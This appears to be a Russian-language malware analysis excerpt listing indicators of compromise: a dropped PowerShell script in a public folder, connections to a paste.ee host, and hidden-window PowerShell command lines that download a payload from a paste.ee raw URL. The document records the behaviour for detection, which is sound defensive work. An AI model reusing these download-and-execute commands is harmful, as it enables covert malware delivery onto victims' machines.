Техническая информация
- C:\users\public\sab80.ps1
- 'pa##e.ee':443
- 'pa##e.ee':443
- DNS ASK pa##e.ee
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy RemoteSigned -File C:\Users\Public\sAB80.PS1
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy RemoteSigned -Command [System.Net.WebClient] $Client = New-Object System.Net.WebClient; [Byte[]] $DownloadedData = $Client.DownloadData('https://paste.ee/r/sAB80/0'); [String] ...' (со скрытым окном)